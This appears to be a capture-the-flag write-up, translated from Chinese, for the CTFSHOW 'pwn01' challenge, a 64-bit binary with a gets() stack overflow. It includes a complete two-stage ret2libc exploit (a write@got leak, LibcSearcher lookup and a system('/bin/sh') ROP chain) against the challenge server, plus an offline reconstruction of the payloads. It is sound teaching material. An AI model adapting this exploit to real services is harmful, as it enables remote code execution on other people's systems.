CTFSHOW内部赛 pwn01_签到题

admin, 2022-01-05 22:47:18


Surager

pwn01_签到题 (sign-in challenge)

$ file ret2libc_64
ret2libc_64: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 2.6.24, BuildID[sha1]=5413104184dd326a27fb848b31d780ff511099bb, not stripped
$ checksec ret2libc_64
[*] '/mnt/e/wsl/ret2libc_64'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

Basic information about the binary. Of the protections, only NX is enabled: there is no stack canary and no PIE, so addresses inside the binary are fixed and a ROP chain can be written onto the stack.

Program flow:

One output, then one input.

[Welcome CTFshow..]
now,Try Pwn Me?
asdf

IDA analysis:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4; // [rsp+0h] [rbp-A0h]

  setvbuf(_bss_start, 0LL, 1, 0LL);
  write(1, "[Welcome XCITC-CTF]\nnow,Try Pwn Me?\n", 0x24uLL);
  gets(&v4, "[Welcome XCITC-CTF]\nnow,Try Pwn Me?\n");
  return 0;
}

Only main is there to exploit. Input is read with gets, which has no length limit, so the stack can be overflowed.

v4 sits 0xA0 bytes below the saved rbp, so the return address is overwritten after 0xA0 + 8 bytes of filler. Construct the payload (bytes literals, so it runs under Python 3 pwntools):

payload = b'a'*0xa0 + b'a'*0x8 + p64(rdi) + p64(1) + p64(rsi_r15) + p64(elf.got['write']) + p64(0) + p64(elf.plt['write']) + p64(main)

Since no pop rdx; ret gadget was found, the byte count passed to write cannot be controlled; whatever rdx happens to hold at that point only needs to be at least 6 so that the low bytes of the libc address are printed.

Then compute the offset from the leak:

leak = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
libc = LibcSearcher('write', leak)
offset = leak - libc.dump('write')
system = offset + libc.dump('system')
binsh = offset + libc.dump('str_bin_sh')
payload = b'a'*0xa0 + b'a'*0x8 + p64(rdi) + p64(binsh) + p64(system)
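The two stages above, built offline as an added example (this is not code from the original writeup or from the challenge). It uses plain struct instead of pwntools so it runs without the remote service. The gadget addresses, the 0xA0 offset and the address of main are the ones from the writeup; the PLT/GOT addresses, the libc offsets and the reply byte stream are constructed stand-ins for elf.plt/elf.got, LibcSearcher's output and what the service sends back. It also adds two checks a practitioner wants in any gets()-based chain: no 0x0a byte in the payload (gets stops there) and a page-aligned libc base (otherwise the chosen libc offsets are wrong).

```python
import struct

# Values from the writeup (non-PIE binary, so these are fixed).
BUF_TO_RBP = 0xA0            # v4 is at [rbp-0xA0]
SAVED_RBP_SIZE = 8           # saved rbp sits between v4 and the return address
POP_RDI_RET = 0x4006c3       # pop rdi; ret
POP_RSI_R15_RET = 0x4006c1   # pop rsi; pop r15; ret
MAIN = 0x4005FD

def p64(value):
    """Pack a 64-bit little-endian value (what pwntools' p64 does)."""
    return struct.pack('<Q', value)

def u64(data):
    return struct.unpack('<Q', data)[0]

def padding():
    """Filler up to and including the saved rbp."""
    return b'a' * BUF_TO_RBP + b'a' * SAVED_RBP_SIZE

def check_gets_safe(chain):
    """gets() stops at a newline byte, so 0x0a anywhere would truncate the chain."""
    if b'\n' in chain:
        raise ValueError('payload contains 0x0a; gets() would cut it short')
    return chain

def build_leak_chain(write_plt, write_got):
    """Stage 1: write(1, write@got, <whatever is in rdx>) and return to main.

    There is no pop rdx gadget, so the length argument is left as-is; the
    leak works as long as rdx >= 6 when write is called."""
    chain = (padding()
             + p64(POP_RDI_RET) + p64(1)                        # rdi = stdout
             + p64(POP_RSI_R15_RET) + p64(write_got) + p64(0)   # rsi = &write@got, r15 = junk
             + p64(write_plt)                                  # call write@plt
             + p64(MAIN))                                      # run main again for stage 2
    return check_gets_safe(chain)

def parse_leak(stream):
    """Recover the leaked pointer from the raw bytes the service sends back.

    Mirrors recvuntil('\\x7f')[-6:].ljust(8, '\\x00'): a userland libc address
    on x86-64 Linux fits in 6 bytes and its top byte is 0x7f."""
    end = stream.index(b'\x7f') + 1
    raw = stream[end - 6:end]
    return u64(raw.ljust(8, b'\x00'))

def libc_addresses(leak, offsets):
    """Turn the leaked write address into libc base, system and "/bin/sh"."""
    base = leak - offsets['write']
    if base & 0xfff:
        raise ValueError('libc base is not page aligned; wrong libc offsets?')
    return base, base + offsets['system'], base + offsets['str_bin_sh']

def build_shell_chain(system, binsh):
    """Stage 2: system("/bin/sh")."""
    chain = padding() + p64(POP_RDI_RET) + p64(binsh) + p64(system)
    return check_gets_safe(chain)

# --- constructed sample data (assumptions, not captured from the real service) ---
WRITE_PLT = 0x4004f0   # hypothetical elf.plt['write']
WRITE_GOT = 0x601018   # hypothetical elf.got['write']
# Offsets of the kind LibcSearcher returns, for one particular libc build;
# the remote target's libc will have different values.
LIBC_OFFSETS = {'write': 0xf72b0, 'system': 0x45390, 'str_bin_sh': 0x18cd57}
SAMPLE_BASE = 0x7f1234567000
# What the service would send: the banner, then the bytes write() dumped
# starting at write@got (the 8-byte entry plus two following GOT entries,
# because rdx is not under our control).
SAMPLE_STREAM = (b'[Welcome XCITC-CTF]\nnow,Try Pwn Me?\n'
                 + p64(SAMPLE_BASE + LIBC_OFFSETS['write'])
                 + p64(0x4004a6) + p64(0x4004b6))

def demo():
    """Run both stages against the constructed data; returns the key values."""
    stage1 = build_leak_chain(WRITE_PLT, WRITE_GOT)
    leak = parse_leak(SAMPLE_STREAM)
    base, system, binsh = libc_addresses(leak, LIBC_OFFSETS)
    stage2 = build_shell_chain(system, binsh)
    return leak, base, system, binsh, len(stage1), len(stage2)

if __name__ == '__main__':
    print([hex(v) for v in demo()])
```

Two caveats when adapting this to a live target: rdx is whatever the last libc call left behind, so if the leak comes back shorter than 6 bytes the parse will grab banner bytes and the base-alignment check will fail; and on x86-64 glibc, system may crash on an SSE instruction if rsp is not 16-byte aligned when it is entered, in which case a single `ret` gadget inserted before the address of system fixes the alignment.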

Full exploit:

from pwn import *
from LibcSearcher import *
io = remote('124.156.121.112', 28020)
elf = ELF('./ret2libc_64')
context.log_level = 'debug'

rdi = 0x00000000004006c3      # pop rdi; ret
rsi_r15 = 0x00000000004006c1  # pop rsi; pop r15; ret
main = 0x4005FD
# stage 1: write(1, write@got, rdx) to leak a libc address, then return to main
payload = b'a'*0xa0 + b'a'*0x8 + p64(rdi) + p64(1) + p64(rsi_r15) + p64(elf.got['write']) + p64(0) + p64(elf.plt['write']) + p64(main)
io.sendline(payload)
# the leaked pointer is 6 significant bytes ending in 0x7f
leak = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
libc = LibcSearcher('write', leak)
offset = leak - libc.dump('write')
system = offset + libc.dump('system')
binsh = offset + libc.dump('str_bin_sh')
# stage 2: system("/bin/sh") once main has run again and is waiting in gets
payload = b'a'*0xa0 + b'a'*0x8 + p64(rdi) + p64(binsh) + p64(system)
io.recvuntil(b'Me?\n')
io.sendline(payload)
io.interactive()

summerN

tql (awesome)


13901583376

It's essentially ret2csu.


Source: CTFSHOW内部赛 pwn01_签到题, https://cn-sec.com/archives/719332.html (CN-SEC; please keep this link when reposting)
